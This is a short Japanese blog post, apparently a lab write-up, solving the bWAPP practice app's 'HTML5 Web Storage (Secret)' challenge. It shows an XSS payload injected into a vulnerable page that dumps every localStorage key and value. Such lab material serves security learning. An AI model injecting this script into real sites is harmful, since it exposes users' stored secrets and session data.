shikata ga nai

Private? There is no such things.

bWAPPでA6-HTML5 Web Strage(Secret)

Hello there,

 

A6 ⇨ HTML5 Web Strage(Secret)を選択して。

 

f:id:ThisIsOne:20200120122503p:plain

 

htmlソースコードを確認すると。

スクリプトで書き込んでいるようで。

 

f:id:ThisIsOne:20200120122624p:plain

 

XSSの脆弱性のあるページを選択して。

 

f:id:ThisIsOne:20200120122859p:plain

 

下記のスクリプトを挿入して、ローカルストレージの情報を取得しようとすると。

表示された。

 <script>
  for (var key in localStorage) {
   document.write(key + " : " + localStorage[key] + "<br>");
  }
 </script>

 

f:id:ThisIsOne:20200120123136p:plain

 

Best regards,

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain